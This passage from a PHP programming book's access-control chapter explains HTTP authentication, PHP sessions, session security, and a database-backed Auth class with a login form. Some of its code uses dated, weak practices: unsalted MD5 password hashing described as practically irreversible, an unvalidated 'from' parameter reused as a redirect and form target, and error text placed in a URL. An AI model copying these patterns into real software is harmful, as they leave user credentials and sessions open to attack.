and investigated the use of try {…} catch (Exception $e) {…} blocks for this purpose. Additionally, we created an exception handler to handle uncaught exceptions.
  • 292. 268 The PHP Anthology Since exceptions are so easy to deal with, and since they allow code flow to continue from the point at which they’re caught, you may want to throw your PHP errors as exceptions, as I explained in this chapter. Finally, we saw how easy it is, after an error or exception is handled, to display graceful error pages that avoid presenting sensitive system information to your users. An alternative—redirecting the users to an error page—was also discussed. This chapter has provided a solid grounding to help you develop a professional approach to managing errors in your PHP scripts. But don’t stop there! The PHP manual has even more information to help you as you improve your PHP practices.
  • 293. 10 Chapter Access Control One of the realities of building your site with PHP, as opposed to plain old HTML, is that you build dynamic web pages rather than static web pages. Making the choice to develop your site with PHP will allow you to achieve results that aren’t possible with plain HTML. But, as the saying goes, with great power comes great responsib­ ility. How can you ensure that only you, or those to whom you give permission, are able to view and interact with your web site, while it remains safe from the Internet’s evil hordes as they run riot, spy on private information, or delete data? In this chapter, we’ll look at the mechanisms you can employ with PHP to build authentication systems and control access to your site. I can’t stress enough the importance of a little healthy paranoia in building web-based applications. The SitePoint Forums frequently receive visits from unhappy web site developers who have had their fingers burned when it came to the security of their sites. Data Transmission Over the Web is Insecure Before we go any further into discussing any specific site security topics, you must be aware that any system you build that involves the transfer of data from a web page over the Internet will send that information in clear text by default
  • 294. 270 The PHP Anthology (unless you’re using HTTPS, which encrypts the data). This potentially enables someone to “listen in” on the network between the client’s web browser and the web server; with the help of a tool known as a packet sniffer, they’ll be able to read the username and password sent via your form, for example. The chance of this risk eventuating is fairly small, as typically only trusted organizations like ISPs have the access required to intercept packets; however, it is a risk, and it’s one you should take seriously. About the Examples in this Chapter Before we dive in, I need to let you know about the example solutions discussed in this chapter. The example classes in some of these solutions require the use of a configuration file: access_control.ini. This file is used to store various database table names and column names used in the examples. Since not everyone names their database tables in the same way, configuration values like these are often intended to be customizable. The access_control.ini file is read into an array using the PHP parse_ini_file function (you can read more about this technique in “How do I store configuration information in a file?” in Chapter 6). The configuration file looks like this: access_control.ini (excerpt) ; Access Control Settings ;web form variables e.g. $_POST['login'] [login_vars] login=login password=password ⋮ more settings follow… When an example uses configuration information from this file, that will be indic­ ated within the section. Similarly, the solutions below assume a certain database configuration. The SQL details relevant to each solution are indicated in the text where appropriate. If you’ve downloaded the code archive for this book from the SitePoint web site, you’ll find a file called access_control_dump.sql in the folder for this chapter. You can use this file to create the database and insert some sample data. Using this
  • 295. Access Control 271 file is identical to using the world database in Chapter 2. The instructions found at http://dev.mysql.com/doc/world-setup/en/world-setup.html can be used to create the access_control database too, like so: command prompt> mysql -u root -p mysql> CREATE DATABASE access_control; mysql> USE access_control; mysql> SOURCE access_control_dump.sql; Of course, you’ll have to add the missing path and password information as ap­ propriate for your system. Finally, all these solutions use the PDO class to make the connection to the data­ base. For more information about using the PDO class, see Chapter 2. All the solutions involving web page forms use the PEAR HTML_QuickForm package. You can read more about using this package in “How do I build HTML forms with PHP?” in Chapter 5. How do I use HTTP authentication? Hypertext Transfer Protocol, or HTTP—the transfer protocol used to send web pages over the Internet to your web browser—defines its own authentication mechanisms. These mechanisms, basic and digest authentication, are explained in RFC 2617.1 If you run PHP on an Apache server, you can take advantage of these mechanisms—digest is available from PHP version 5.1.0—using PHP’s header function and a couple of predefined variables. A general discussion of these features is provided in the Features section of The PHP Manual.2 HTTP Authentication and Apache If you wish to use HTTP authentication on your web site, you can set it up using only the Apache configuration settings—PHP is not required. For more information on how to do this, see the Apache documentation for your server version.3 1 http://www.ietf.org/rfc/rfc2617 2 http://www.php.net/manual/en/features.http-auth.php 3 For example, the documentation for version 2.2 can be found at http://httpd.apache.org/docs/2.2/howto/auth.html.
  • 296. 272 The PHP Anthology Solution Let’s step through a simple example page that uses the $_SERVER['PHP_AUTH_USER'] and $_SERVER['PHP_AUTH_PW'] automatic global variables and the WWW-Authenticate HTTP header to protect itself—if the current user is not in a list of allowed users, access is denied. First, we need a list of valid usernames and passwords. For the purpose of this simple demonstration, we’ll just use an array, but this would not be advisable for a real-world situation where you’d likely use a database (which we’ll see in “How do I build a registration system?”). Here’s the $users array: httpAuth.php (excerpt) <?php $users = array( 'jackbenimble' => 'sekret', 'littlepig' => 'chinny' ); Next, we test for the presence of the automatic global variable $_SERVER['PHP_AUTH_USER']. If the variable is not set, a username hasn’t been submitted and we need to make an appropriate response—a HTTP/1.1 401 Unau­ thorized response code, as well as a second header to indicate that we require basic authentication using the WWW-Authenticate header: httpAuth.php (excerpt) if (!isset($_SERVER['PHP_AUTH_USER'])) { header('HTTP/1.1 401 Unauthorized'); header('WWW-Authenticate: Basic realm="PHP Secured"'); exit('This page requires authentication'); } If a username has been submitted, we need to check that the username exists in our list of valid usernames, then ensure that the submitted password matches the one associated with the username in our list:
  • 297. Access Control 273 httpAuth.php (excerpt) if (!isset($users[$_SERVER['PHP_AUTH_USER']])) { header('HTTP/1.1 401 Unauthorized'); header('WWW-Authenticate: Basic realm="PHP Secured"'); exit('Unauthorized!'); } if ($users[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) { header('HTTP/1.1 401 Unauthorized'); header('WWW-Authenticate: Basic realm="PHP Secured"'); exit('Unauthorized!'); } Finally, if all our checks pass muster, we can proceed to display the web page. In this example, we simply display the credentials we’ve received from the authentic­ ation form. Of course, this output is for demonstration purposes only—you’d never do this in a real situation: httpAuth.php (excerpt) echo 'You're in ! Your credentials were:<br />'; echo 'Username: ' . $_SERVER['PHP_AUTH_USER'] . '<br />'; echo 'Password: ' . $_SERVER['PHP_AUTH_PW']; ?> Discussion To understand how HTTP authentication works, you must first understand what actually happens when your browser sends a web page request to a web server. HTTP is the protocol for communication between a browser and a web server. When your browser sends a request to a web server, it uses an HTTP request to tell the server which page it wants. The server then replies with an HTTP response that describes the type and characteristics of the document being sent, then delivers the document itself. For example, a client might send the following request to a server:
  • 298. 274 The PHP Anthology GET /subcat/98 HTTP/1.1 Host: www.sitepoint.com Here’s what it might receive from the server in return: HTTP/1.1 200 OK Date: Sat, 24 Mar 2007 08:12:44 GMT Server: Apache/2.0.46 (Red Hat) X-Powered-By: PHP/4.3.11 Transfer-Encoding: chunked Content-Type: text/html; charset=ISO-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <title>PHP &amp; MySQL Tutorials</title> ⋮ and so on… If you’d like to see this process in action, the next example will give you the chance, as we open a connection to www.sitepoint.com and request /subcat/98.4 The ex­ ample script will read the response from the server and output the complete HTTP response for you: seeHeaders.php <?php // Connect to sitepoint.com $fp = fsockopen('www.sitepoint.com', '80'); // Send the request fputs($fp, "GET /subcat/98 HTTP/1.1rnHost: www.sitepoint.comrnrn"); // Fetch the response $response = ''; while (!feof($fp)) { $response .= fgets($fp, 128); } 4 We use sockets in the next example to illustrate the passing of the HTTP headers. You can use any of a multitude of alternative methods to get the contents of the page itself, from file_get_contents to fopen, fread, and fclose. For more information, see Chapter 6.
  • 299. Access Control 275 fclose($fp); // Convert HTML to entities $response = htmlspecialchars($response); // Display the response echo nl2br($response); ?> Authentication headers are additional headers sent by a server to instruct the browser that it must send a valid username and password in order to view the page. In response to a normal request for a page secured with basic HTTP authentication, a server might respond with headers like these: HTTP/1.1 401 Authorization Required Date: Tue, 25 Feb 2003 15:41:54 GMT Server: Apache/1.3.27 (Unix) PHP/4.3.1 X-Powered-By: PHP/4.3.1 WWW-Authenticate: Basic realm="PHP Secured" Connection: close Content-Type: text/html No further information is sent, but notice the status code HTTP/1.1 401 Authorization Required and the WWW-Authenticate header. Together, these HTTP request elements indicate that the page is protected by HTTP authentication, and isn’t available to an unauthorized user. A visitor’s browser can convey this information in a variety of ways, but usually the user will see a small popup like that shown in Figure 10.1. Figure 10.1. The Authentication Required dialog
  • 300. 276 The PHP Anthology The dialog prompts site visitors to enter their usernames and passwords. After vis­ itors using Internet Explorer have entered these login details incorrectly three times, the browser displays the “Unauthorized” message instead of displaying the prompt again. In other browsers, such as Opera, users may be able to continue to try to log in indefinitely. Notice that the realm value specified in the WWW-Authenticate header is displayed in the dialog. A realm is a security space or zone within which a particular set of login details are valid. Upon successful authentication, the browser will remember the correct username and password combination, and automatically resend any future request to that realm. When the user navigates to another realm, however, the browser displays a fresh prompt once again. In any case, the user must provide a username and password to access the page. The browser sends those credentials with a second page request like this: GET /admin/ HTTP/1.1 Host: www.sitepoint.com Authorization: Basic jTSAbT766yN0hGjUi The Authorization header contains the username and password encoded with base64 encoding which, it’s worth noting, isn’t secure—it’s unreadable for humans, but it’s a trivial task to convert base64-encoded values back to the original text. The server will check to ensure that the credentials are valid. If they’re not, the server will send the HTTP/1.1 401 Authorization Required response again, as shown previously. If the credentials are valid, the server will send the requested page as normal. A package you should consider if you expect to use the HTTP Authentication a lot is the HTTP_Auth package available from PEAR.5 HTTP_Auth provides an easy-to­ use API so that you don’t have to worry about handling the header calls yourself. Sending Headers In PHP, the moment your script outputs anything that’s meant for display, the web server finishes sending the headers and begins to send the content itself. You 5 You can view the package’s information at http://pear.php.net/Auth_HTTP/.
  • 301. Access Control 277 cannot send further HTTP headers once the output of the body of the HTTP mes­ sage—the web page itself—has commenced. If you do use the header or session_start functions after the rendering of the body has begun, you’ll see an error message like this: Warning: Cannot add header information - headers already sent by (output started at… Remember, any text or whitespace outside the <?php … ?> tags causes output to be sent to the browser. If you have whitespace before a <?php tag or after a ?> tag, you won’t be able to send headers to the browser beyond that point. How do I use sessions? Sessions are a mechanism that allows PHP to preserve state between executions. In simple terms, sessions allow you to store variables from one page—the state of that page—and use them on another. For example, if a visitor submits his first name, Bob, via a form on your site, sessions will allow your site to remember his name, and allow you to place personal messages such as “Where would you like to go today, Bob?” on all the other pages of your site for the duration of his visit. Don’t be surprised if Bob leaves rather quickly, though! The basic mechanism of sessions works like this: first, PHP generates a unique, 32­ character string to identify the session. PHP then passes the value to the browser; simultaneously, it creates a file on the server and includes the session ID in the fi­ lename. There are two methods by which PHP can keep track of the session ID: it can add the ID to the query string of all relative links on the page, or send the ID as a cookie. Within the file that’s stored on the server, PHP saves the names and values of the variables it’s been told to store for the session. When the browser makes a request for another page, it tells PHP which session it was assigned via the URL query string, or by returning the cookie. PHP then looks up the file it created when the session was started, and so has access to the data stored within the session. Once the session has been established, it’ll continue until it’s specifically destroyed by PHP (in response to a user clicking Log out, for example), or the session has been inactive for longer than a given period of time (as specified in your php.ini file under
  • 302. 278 The PHP Anthology session.gc_maxlifetime). At this point it becomes flagged for garbage collection and will be deleted the next time PHP checks for outdated sessions. Solution Here’s a very simple demonstration of storing and retrieving a session variable: simpleSession.php <?php session_start(); // If session variable doesn't exist, register it if (!isset($_SESSION['test'])) { $_SESSION['test'] = 'Hello World!'; echo '$_SESSION['test'] is registered.<br />' . 'Please refresh page'; } else { // It's registered so display it echo '$_SESSION['test'] = ' . $_SESSION['test']; } ?> The script registers the session variable test the first time the page is displayed. The next time (and all times thereafter, until the session times out through inactivity), the script will display the value of the test session variable. Discussion In general, sessions are easy to use and powerful—they’re an essential tool for building online applications. The first order of business in a script that uses sessions is to call session_start to load any existing session variables. You should always access session variables via the predefined global variable $_SESSION, not the functions session_register and session_unregister. session_register and session_unregister fail to work correctly when PHP’s register_globals setting has been disabled, which should always be the case. In the following HTTP response headers, a server passes a session cookie to a browser as a result of the session_start function in a PHP script:
  • 303. Access Control 279 HTTP/1.1 200 OK Date: Wed, 26 Feb 2003 02:23:08 GMT Server: Apache/1.3.27 (Unix) PHP/4.3.1 X-Powered-By: PHP/4.3.1 Set-Cookie: PHPSESSID=ce558537fb4aefe349bb8d48c5dcc6d3; path=/ Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> ⋮ and so on… Storing Sessions Elsewhere Notice that I’ve said sessions are stored, by default, on the server as files. It’s also possible to store sessions elsewhere, such as in a database or even shared memory. We’ll discuss creating a custom session handler for saving the session variables to a database in “How do I store sessions in a database?”. Storing sessions in database can be useful for displaying “who’s online” information, and for load- balancing multiple web servers using a single-session repository—a mechanism that allows visitors to (unknowingly) swap servers while their session is main­ tained. Sessions Aren’t Perfect While sessions are a wonderful tool, they can easily cause headaches if you don’t understand their limitations. Take care when you handle data that’s relevant to the session state. For example, when users open multiple windows for a site, a script executed in one window may overwrite data saved from another, rolling back a user to an earlier state in the site. Also be aware that resource handles and references are not saved with an object in the session—you need to release and recreate them in the __sleep and __wakeup methods of your classes.6 Also, try to keep the amount of data in the session variables to a minimum, as pulling large chunks of data that aren’t used for every page may slow the pages down. 6 __sleep and __wakeup are examples of magic methods, and are explained at http://www.php.net/manual/en/language.oop5.magic.php.
  • 304. 280 The PHP Anthology Session Security Sessions are very useful, but there are some important security considerations you should take into account when you use sessions in your applications. By default, all a browser has to do to gain control of a session is pass a valid session ID to PHP. In an ideal world, you could store the IP address that registered the ses­ sion, and double-check it against every new request that used the associated session ID. Unfortunately, some ISPs, such as AOL, assign their users a new IP on almost every page request, so this type of security mechanism would soon start to throw valid users out of the system. As such, it’s important to design your application in a manner that assumes that one of your users will eventually have his or her session “hijacked.” The user’s account is exposed until the session expires, so your aim should be to prevent the hijackers from causing serious damage while the session is active. This means, for example, that when a logged-in user goes to change his or her account password, the old password must be provided—obviously, hijackers won’t know that. Also, be careful with the way you handle the users’ personal information (such as credit card details). If you give users the opportunity to make significant changes to their account details, such as change a shipping addresses, be sure to send a summary notification of that change to them via email to alert users whose sessions may have been hijacked. Keep the session ID completely hidden, using SSL (secure sockets layer) to encrypt the conversation. What’s more, you should only use the cookie method of passing the session ID. If you pass it in the URL, you might give away the session ID upon referring the visitor to another site, thanks to the referer header in the HTTP request. The files PHP creates for the purpose of storing session information are, by default, stored in the temporary directory of the operating system under which PHP is run­ ning. On Unix-based systems such as Linux, this directory will be /tmp. And, if you’re on a shared server, the session files from all the hosted sites will be stored together, which means that other users on the server can read the files’ contents. They might not be able to identify which virtual host and PHP script are the owners of the session but, depending on the information you place there, they might be able to guess.
  • 305. Access Control 281 This possibility is a serious cause for concern on shared PHP systems; the most ef­ fective solution is to store your sessions in a database, rather than in the server’s temporary directory. We’ll look more closely at custom session handlers later in this chapter, but a partial solution is to set the session.save_path option in your php.ini to a directory that’s not available to the public. You’ll need to contact your hosting company in order to have the correct permissions set for that directory, so that the nobody or wwwuser user with which PHP runs has access to read, write, and delete files in that directory. One final warning: with the help of a common web security exploit, cross-site scripting, or XSS, it’s possible for an attacker to place JavaScript on your site that will cause visitors to give away their session IDs to a remote web site, thereby allow­ ing their sessions to be hijacked. If you allow your visitors to post any HTML to your site, make sure you check and validate it very carefully. Remember the golden rules: never rely on client-side technologies (such as JavaScript) to handle security, and never trust any content submitted from a browser. How do I create a session class? You can make a simple wrapper class to handle your sessions. Doing so ensures that if you ever want to switch to an alternative session-handling mechanism, such as one you’ve built yourself, you simply need to modify the class rather than rewrit­ ing a lot of code. We can provide an interface to the $_SESSION variable with a few simple methods. Solution Our custom Session class begins with the constructor method that simply calls session_start: Session.class.php (excerpt) class Session { public function __construct() { session_start(); }
  • 306. 282 The PHP Anthology We can then add the set and get methods to set a session variable and get a session variable, respectively: Session.class.php (excerpt) public function set($name, $value) { $_SESSION[$name] = $value; } public function get($name) { if (isset($_SESSION[$name])) { return $_SESSION[$name]; } else { return false; } } Finally, we add a del method to delete a session variable, and the destroy method to remove all session variables and reset the session: Session.class.php (excerpt) public function del($name) { unset($_SESSION[$name]); } function destroy() { $_SESSION = array(); session_destroy(); session_regenerate_id(); } }
  • 307. Access Control 283 How do I create a class to control access to a section of the site? Now we reach the business end of access control—let’s look at a class that controls who’s permitted access to those private sections of your site. This class uses a database to hold the access credentials and works with an HTML login form. Solution The Auth class wraps login, session storage, and logout functionality in a simple, easy-to-use PHP class. The Auth Class The Auth class uses the following configuration settings: access_control.ini (excerpt) ; Access Control Settings ;web form variables e.g. $_POST['login'] [login_vars] login=login password=password hash=login_hash ;user login table details [users_table] table=user col_login=login col_password=password The first two settings reflect the names of the username and password fields that will appear on the login form we’ll build in a moment. They’ll match the names of the $_POST variables submitted by the form: $_POST['password'], for example. The next three settings provide details of the table in which user information is stored—the name of the table, and the names of the username and password columns in the table.
  • 308. 284 The PHP Anthology The database table user will be used in all the solutions in this section. Here’s the SQL for the table: access_control.sql (excerpt) CREATE TABLE user ( user_id INT(11) NOT NULL AUTO_INCREMENT, login VARCHAR(50) NOT NULL DEFAULT '', password VARCHAR(50) NOT NULL DEFAULT '', email VARCHAR(50) DEFAULT NULL, firstName VARCHAR(50) DEFAULT NULL, lastName VARCHAR(50) DEFAULT NULL, signature TEXT NOT NULL, PRIMARY KEY (user_id), UNIQUE KEY user_login (login) ); The Auth class body begins with the class properties: Auth.class.php (excerpt) class Auth { protected $db; protected $cfg; protected $session; protected $redirect; protected $hashKey; The $db property will store an instance of our DB connection class, while the $cfg property will store the configuration settings. The $session property will store an instance of the Session class we created in “How do I create a session class?”. The $redirect property will store a URL to which visitors will be redirected if they aren’t logged in, or if their usernames or passwords are incorrect; this might be a login form, for example. The $hashKey property is a seed we provide to double- check the usernames and passwords of users who are already logged in. I’ll explain this in more detail later. Now we can create the constructor method of our Auth class:
  • 309. Access Control 285 Auth.class.php (excerpt) function __construct(PDO $db, $redirect, $hashKey) { $this->db = $db; $this->cfg = parse_ini_file('access_control.ini', TRUE); $this->redirect = $redirect; $this->hashKey = $hashKey; $this->session = new Session(); $this->login(); } The constructor requires a $db parameter that accepts an instance of the PDO class (although you can alter it to a custom class—just be sure to adjust the database in­ teraction areas as required for your class). The $redirect parameter is a URL string and the $hashKey parameter is a string. In the constructor, we set the Auth instance variables, load the configuration file, and create a new instance of the Session class, which we store in the $session property; finally, we call the login method to validate the user against the database. The login method checks the user’s login credentials: Auth.class.php (excerpt) private function login() { $var_login = $this->cfg['login_vars']['login']; $var_pass = $this->cfg['login_vars']['password']; $user_table = $this->cfg['users_table']['table']; $user_login = $this->cfg['users_table']['col_login']; $user_pass = $this->cfg['users_table']['col_password']; if ($this->session->get('login_hash')) { $this->confirmAuth(); return; } if (!isset($_POST[$var_login]) || !isset($_POST[$var_pass])) { $this->redirect(); }
  • 310. 286 The PHP Anthology The configuration settings are assigned to local variables for the sake of readability. The login method first checks to see whether values for the username and password are currently stored in the session; if they are, it calls the confirmAuth method. If username and password values are not stored in the session, the method checks to see whether they’re available in the $_POST array; if they’re not, the method calls the redirect method. Assuming the script has found the $_POST values, it calls the md5 function to get a digest for the password: Auth.class.php (excerpt) $password = md5($_POST[$var_pass]); We use the MD5 algorithm to store the password for security reasons, either in the session or on the database—we don’t want to leave plain-text passwords lying around. The MD5 Algorithm MD5 is a simple message digest algorithm (often referred to as one-way encryption) that translates any string (such as a password) into a short series of ASCII characters called an MD5 digest. A particular string will always produce the same digest, but it’s practically impossible to guess a string that will produce a given digest. By storing only the MD5 digest of your users’ passwords in the database, you can verify their login credentials without actually storing the passwords on your server! The built-in PHP function md5 lets you calculate the MD5 digest of any string in PHP. The script then performs a query against the database to see if it can find a record to match the submitted username and password: Auth.class.php (excerpt) try { $sql = "SELECT COUNT(*) AS num_users " . "FROM " . $user_table . " WHERE " . $user_login . "=:login AND " . $user_pass . "=:pass";
  • 311. Access Control 287 $stmt = $this->db->prepare($sql); $stmt->bindParam(':login', $_POST[$var_login]); $stmt->bindParam(':pass', $password); $stmt->execute(); $row = $stmt->fetch(PDO::FETCH_ASSOC); } catch (PDOException $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() ); $this->redirect(); } if ($row['num_users'] != 1) { $this->redirect(); } else { $this->storeAuth($_POST[$var_login], $password); } } We use the PDO methods prepare and execute to perform the database query, binding our $_POST[USER_LOGIN_VAR] and $password variables to the SQL paramet­ ers :login and :pass respectively. We can’t authenticate the user reliably if a PDOException is thrown, so in that case, we log the error and call the redirect method. After we fetch the result of the query, we test that there is exactly one matching re­ cord. If not, we call the redirect method. Finally, assuming it has reached this point, the script registers the username and password as session variables by way of the storeAuth method (explained below), which makes them available for future page requests.
  • 312. 288 The PHP Anthology login and Magic Quotes One point to note about the login method is that it assumes magic_quotes_gpc is switched off. In the scripts that utilize this class, we’ll need to nullify the effect of magic quotes. You can read more about this task in the section called “Checking for Magic Quotes” in Chapter 1. The storeAuth method is used to add the username and password digest to the session, along with a special hash value: Auth.class.php (excerpt) public function storeAuth($login, $password) { $this->session->set($this->cfg['login_vars']['login'], $login); $this->session->set($this->cfg['login_vars']['password'], $password); $hashKey = md5($this->hashKey . $login . $password); $this->session->set($this->cfg['login_vars']['hash'], $hashKey); } This special hash value is comprised of a seed value—the $hashKey parameter re­ quired by the constructor—as well as the username and password values. As we’ll see in the confirmAuth method below, instead of laboriously checking the database to verify the login credentials whenever a user requests a page, the class simply checks that the current username and password produce a hash value that’s the same as that stored in the session. This approach prevents potential attackers from attempting to change the stored username after login if your PHP configuration has register_globals enabled. The confirmAuth method is used to double-check credentials stored in the session once a user is logged in: Auth.class.php (excerpt) private function confirmAuth() { $login = $this->session->get( $this->cfg['login_vars']['login']); $password = $this->session->get(
  • 313. Access Control 289 $this->cfg['login_vars']['password']); $hashKey = $this->session->get( $this->cfg['login_vars']['hash']); if (md5($this->hashKey . $login . $password) != $hashKey) { $this->logout(true); } } Notice how we reproduce the hash built by the storeAuth method—if this fails to match the original hash value, the user is immediately logged out. The logout method is used to remove the login credentials from the session, destroy the session, and return the user to the page URL stored in the $redirect property: Auth.class.php (excerpt) public function logout($from = false) { $this->session->del($this->cfg['login_vars']['login']); $this->session->del($this->cfg['login_vars']['password']); $this->session->del($this->cfg['login_vars']['hash']); $this->session->destroy(); $this->redirect($from); } For security reasons, I choose to destroy the session here and start a completely new one. However, you may want to consider whether or not you wish to destroy the session. When the session is destroyed, not only are the Auth credentials re­ moved, but all session data is as well, and a new session ID is created. If you have session data that you don’t want to lose upon logout, you may wish to remove or comment out the session->destroy method call. The final piece of our Auth class is the redirect method: Auth.class.php (excerpt) private function redirect($from = true) { if ($from) {
  • 314. 290 The PHP Anthology header('Location: ' . $this->redirect . '?from=' . $_SERVER['REQUEST_URI']); } else { header('Location: ' . $this->redirect); } exit(); } } The redirect method is used to return the visitor to the login form (or whichever URL we specified upon instantiating the Auth class). By default, this method will send the original page URL, requested in the from variable, in the query string to the URL to which the browser is redirected—most likely the login form. This allows the login form to read the query string and return the users to the location from which they came; it saves the users from having to navigate back to that point, which feature might be useful if, for example, a session times out. Note that I specified in the logout method that redirect should not provide the from variable. If it did, the script might return users to the URL they used to log out, trapping them in a loop from which they can’t log in. One important point to note here is that the redirection URL argument passed to the constructor function should be absolute, not relative. According to the HTTP specification, an absolute URL must be provided when a Location header is used. Later on, when we put this class into action, I’ll break that rule and use a relative URL, because I can’t guess the script’s location on your server. This trick works because most recent browsers understand the relative location anyway (even though they shouldn’t, as this doesn’t honour the specification). On a live site, though, make sure you provide a full, absolute URL. Finally, and most importantly, we use the exit function to terminate all further processing. Calling the exit function prevents the calling script from sending the protected content that follows the authentication code. Although we’ve sent a header that should redirect the browser, we can’t rely on the browser to do what it’s told. If the request were sent by, for instance, a Perl script pretending to be a web browser, whoever was using the script would, no doubt, have total control over
  • 315. Access Control 291 its behavior and could quite easily ignore the instruction to redirect elsewhere. Hence, the exit statement is crucial. The Restricted Area Now that you’ve seen the internals of the Auth class, let’s take a look at some code that makes use of it. Here’s an example of a page we want to protect. First, we list the files we require: access.php (excerpt) <?php require_once 'strip_quotes.php'; require_once 'Session.class.php'; require_once 'Auth.class.php'; require_once 'dbcred.php'; strip_quotes.php is a general-purpose script that checks for magic_quotes_gpc = On and strips them from incoming requests, if necessary. classes/Session.class.php is the Session class required by our Auth class and classes/Auth.class.php is the Auth class itself. dbcred.php contains our database login credentials for use with PDO. The file contains credentials relevant to our testing environment, so you’ll need to change them should you wish to try this on your own web server. Next, we instantiate the PDO object and authenticate the user. This code needs to go at the top of any page we wish to protect from unauthorized access: access.php (excerpt) try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch (PDOException $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() );
  • 316. 292 The PHP Anthology header('Location: error.php?err=Database Error&msg=' . $e->getMessage()); exit(); } $auth = new Auth($dbh, 'login.php', 'secret'); if (isset($_GET['action']) && $_GET['action'] == 'logout') { $auth->logout(); } ?> First, we attempt to create a PDO instance to connect to our database. If an exception is thrown and we can’t connect, we don’t want to reveal our protected content. In­ stead, we simply log the error, and redirect the user to an error page that displays some helpful information. Once we have a PDO instance, we can create a new Auth instance to check the current user’s login credentials. We pass our PDO instance, the URL of our login form—login.php, and the seed for the login details hashing func­ tionality to the constructor function. Following that, we use an if statement to check for a logout request. If a $GET['action'] variable is present and it equals the value logout, we know the logout link has been clicked and we should log the user out by way of the Auth->logout method. All we have to do to make a logout link is append ?action=logout to any URL on our site. Finally, here’s the HTML of our restricted page, complete with a logout link: access.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML head contents… </head> <body> ⋮ restricted content… <p><a href="<?php echo $_SERVER['PHP_SELF']; ?>?action=logout"> Logout</a></p> </body> </html>
  • 317. Access Control 293 The only way the user can view this page is to provide a correct username and password. The Auth class performs the security check as soon as it’s instantiated. If valid username and password values have been submitted via a form, they’re stored by the Auth class in a session variable, which allows the visitor to continue using the sites various sections without having to log in again. Creating the login form itself isn’t complex, but it’s made even easier with the PEAR::HTML_QuickForm package. HTML_Quickform allows us to add fields to our form and define the validation requirements easily. I won’t launch into an explana­ tion of how this works, but if you’d like to learn more about HTML_Quickform, you can read the documentation online.7 PEAR PHP 5 E_STRICT Compliance It should be noted that most PEAR packages are not PHP 5 E_STRICT compliant. You can expect errors to be generated, but don’t forget that you can turn them off with the error_reporting function. Submit a bug report to the PEAR bug system for any errors you do come across to help stomp them out in future versions.8 Let’s begin the login form: we’ll start by setting the error reporting level and requiring the PEAR::HTML_QuickForm package: login.php (excerpt) <?php error_reporting(E_ALL); require_once 'HTML/QuickForm.php'; We set the error reporting level to E_ALL with the error_reporting function since we’re using PEAR packages, which will cause E_Strict errors under PHP 5. Next we check for the presence of a $_GET['from'] variable: 7 http://pear.php.net/manual/en/package.html.html-quickform.php 8 http://pear.php.net/bugs/
  • 318. 294 The PHP Anthology login.php (excerpt) if (isset($_GET['from'])) { $target = $_GET['from']; } else { $target = 'access.php'; } ?> The $_GET['from'] variable will have been set by our Auth class if it’s required. This variable will represent the page to which the user was trying to gain access, and from which they’ve been redirected to this login form. It’s used as the form’s action attribute to send the user back to that page once he or she is logged in. Otherwise, for the purposes of this demonstration, the form defaults to access.php, our demonstration-restricted content page. The next step is to construct our form with the PEAR::HTML_QuickForm class: login.php (excerpt) $form = new HTML_QuickForm('loginForm', 'POST', $target); // Add a header to the form $form->addElement('header', 'MyHeader', 'Please Login'); // Add a field for the login name $form->addElement('text', 'login', 'Username'); $form->addRule('login', 'Enter your login', 'required', false, 'client'); // Add a field for the password $form->addElement('password', 'password', 'Password'); $form->addRule('password', 'Enter your password', 'required', false, 'client'); // Add a submit button $form->addElement('submit', 'submit', ' Login '); ?>
  • 319. Access Control 295 Finally, we have the HTML for the login form page: login.php (excerpt) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML head contents… </head> <body> <h1>Please log in</h1> <?php echo $form->toHTML(); ?> </body> </html> The finished login form can be see in Figure 10.2. Figure 10.2. The finished login form Discussion Access control consists of two main parts, or stages: Authentication Authentication is the process by which you determine that users are who they say they are. Our Auth class handles this determination for us in the login method, when we confirm the username and password against the database.
  • 320. 296 The PHP Anthology We make the assumption that only the correct user will have these two pieces of information. Authorization Authorization is the process by which you determine which permissions must be given to an authenticated user. The Auth class is very limited in this respect, as no levels of access are defined—there’s only global access or no access to the site. Of course, you may want to grant a level of access that lies somewhere between these extremes, in which case you should see “How to do I build a permissions system?” You may wonder why we handle the users in this class using a database, rather then something similar to the HTTP authentication explained earlier. There are a couple of reasons, actually. First, as a site grows from only a few members to hun­ dreds, thousands, or millions (we hope) of members, HTTP authentication becomes harder to handle and slower. Yes, we can add the member details to the user file, but as this, in turn, grows larger, it takes longer for the server to read and find a given user. Second, what if we want to store more information about the user—as, of course, most of us do—than just the username and password? Where would we keep that information? Well, we’d keep it in the database, of course. Doesn’t that mean we’re storing user information in two places? Yes, that’s right and, as you know, that’s something we’d want to avoid; it just makes the job harder for us if we ever have to go back and change things later. Room for Improvement The basic mechanics of the Auth class are solid, but it lacks the more sophisticated elements that will be necessary to halt the efforts of any serious intruders. It’s a good idea to implement a mechanism that can keep an eye on the number of failed login attempts made from a single client. If your application always responds immediately to any login attempt, it will be possible for a potential intruder to make large numbers of requests—with different username and password combinations—in a very short time, possibly using 